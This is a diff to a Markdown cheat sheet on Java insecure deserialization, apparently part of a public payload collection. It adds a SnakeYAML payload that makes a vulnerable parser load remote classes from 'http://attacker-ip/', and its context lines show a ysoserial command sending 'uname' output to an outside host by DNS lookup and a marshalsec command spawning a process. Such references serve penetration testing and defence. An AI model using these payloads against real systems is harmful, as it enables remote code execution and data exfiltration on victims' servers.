YAML Deserialization

Insecure Deserialization/Java.md

@@ -10,6 +10,7 @@
     * [Ysoserial](#ysoserial)
     * [Burp extensions using ysoserial](#burp-extensionsl)
     * [Alternative Tooling](#alternative-tooling)
+* [YAML Deserialization](#yaml-deserialization)
 * [References](#references)
 
 
@@ -100,7 +101,7 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
   python yss_url.py yss_new.bin
   java -cp JavaSerializationTestSuite DeSerial yss_new.bin
   ```
-- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
+- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution
   ```java
   $ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
   $ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
@@ -131,6 +132,21 @@ Payload generators for the following marshallers are included:
 | YAMLBeans                       | third party RCE |
 
 
+
+## YAML Deserialization
+
+SnakeYAML
+
+```yaml
+!!javax.script.ScriptEngineManager [
+  !!java.net.URLClassLoader [[
+    !!java.net.URL ["http://attacker-ip/"]
+  ]]
+]
+```
+
+
+
 ## References
 
 - [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau - March 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)